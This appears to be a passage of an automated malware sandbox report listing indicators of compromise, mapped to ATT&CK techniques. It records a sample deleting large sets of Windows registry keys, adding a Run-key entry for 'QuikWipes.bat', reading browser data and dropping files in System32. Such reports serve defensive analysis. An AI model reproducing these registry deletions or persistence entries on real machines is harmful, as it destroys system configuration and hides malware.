Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Standard TCP/IP Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\WSD Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Local Port	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Microsoft Shared Fax Monitor	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\Standard TCP/IP Port\Ports	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Print\Monitors\USB Monitor	reg.exe

Sets file execution options in registry 2 TTPs 42 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ois.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenotem.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordconv .exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clview.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msfeedssync.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ose.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\selfcert.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msaccess.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msoxmled.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstordb.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dw20.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\groove.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ielowutil.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\infopath.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\accicons.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cnfnot32.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onelev.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scanost.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scanpst.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vpreview.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excel.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excelcnv.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie4uinit.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msqry32.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstore.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powerpnt.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Winword.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\outlook.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxp.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwtrig20.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msohtmed.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspub.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onenote.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ExtExport.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\graph.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieUnatt.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msosync.exe	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setlang.exe	reg.exe

Modifies system executable filetype association 2 TTPs 45 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\{8895b1c6-b41f-4c1c-a562-0d564250836f}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\Compatibility	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\ShellEx\DropHandler	reg.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0000-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6F3DD387-5AF2-492B-BDE2-30FF2F451241}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0074-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E17C-0000-0000-C000-000000000046}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC9E435A-F037-11CD-8701-00AA003F0F07}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8075733B-5146-11D5-A672-00B0D022E945}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E185-0000-0000-C000-000000000046}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F055-0000-0000-C000-000000000046}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0067-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0005-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0015-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0013-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0046-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0078-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EE84065-8BA3-4a8a-9542-6EC8B56A3378}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEDE-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0051-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0017-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F069-0000-0000-C000-000000000046}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0029-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{08F6C820-3CFD-11D1-98BC-006008197D41}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0080-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3B06E957-E47C-11CD-8701-00AA003F0F07}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E03AD86-431E-4879-A572-EF0EBA2FA729}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{82B02375-B5BC-11CF-810F-00A0C9030074}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0053-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{14010e02-bbbd-41f0-88e3-eda371216584}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0069-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{044E54C5-B19B-11CE-A689-00AA003F0F07}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{266EEE41-6C63-11cf-8A03-00AA006ECB65}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0083-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757309-5146-11D5-A672-00B0D022E945}\InprocServer32\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{08F6C81C-3CFD-11D1-98BC-006008197D41}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0073-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0078-ABCDEFFEDCBA}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEE2-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0010-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0040-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0006F063-0000-0000-C000-000000000046}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{70cba7d2-50a5-4383-8aa5-b378c01c7364}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8A683C93-BA84-11CF-8110-00A0C9030074}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0077-ABCDEFFEDCBC}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0004-ABCDEFFEDCBB}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBA}\InprocServer32	reg.exe

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_awspeGfa_w32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QuikWipes.bat"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Installs/modifies Browser Helper Object 2 TTPs 9 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}	reg.exe

Maps connected drives based on registry 3 TTPs 3 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

reg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	reg.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	reg.exe

Drops file in System32 directory 3 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File created	C:\Windows\System32\LogonUI.exe	cmd.exe
File created	C:\Windows\SysWOW64\*	cmd.exe
File opened for modification	C:\Windows\System32\ickr0a.exe	cmd.exe

Drops file in Windows directory 64 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~4	cmd.exe
File opened for modification	C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\ShellUI.MST	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B7449A0000000010\9.0.0\UL_MSV~3.98C	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_7457~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRDDAB~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~2.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UI3EAD~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_CENT~4	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_77A9~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_68A2~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_5CEF~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~4.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIA3D3~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\WINDOW~1.DLL	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_CENT~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_A468~1	cmd.exe
File opened for modification	C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_AE83~1	cmd.exe
